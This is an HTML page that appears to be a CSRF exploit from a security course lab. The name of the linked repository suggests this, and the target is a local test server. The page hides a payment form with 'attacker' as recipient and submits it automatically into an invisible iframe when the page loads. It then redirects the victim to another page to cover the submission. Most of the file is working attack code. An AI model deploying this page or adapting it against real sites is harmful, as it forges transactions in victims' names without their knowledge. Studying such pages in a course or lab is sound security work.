<!DOCTYPE html>
<html>

<head>
<style>
form{visibility:hidden;}
h3{visibility:hidden;}
</style>
</head>


<div class="payment-form">
  <h3 class="payment-header">Make payment?</h3>
  <form action="http://localhost:8080/pay" method="post" target="temp">
    <div class="form-group">
      <div class="form-label">To:</div>
      <div class="form-input"><input name = "recipient" type = "text" value="attacker"/></div>
    </div>
    <div class="form-group" value = >
      <div class="form-label">Amount:</div>
      <div class="form-input"><input name="amount" type= "number" value="10"/></div>
    </div>
    <input class="form-button" type="submit" value="Pay"/>
  </form>
</div>


<body>
	
<iframe id="paymentSubmit" src="" name="temp" style="height:0;width:0;border:0;border:none"  ></iframe>
<script> 
	onload=document.forms[0].submit()
</script>
<script>
	document.getElementById('paymentSubmit').onload = 
	function() {
		window.top.location.href = "http://github.com/tomrist/cs5435-fall2019"; 
	};
</script>
	
</body>

</html>

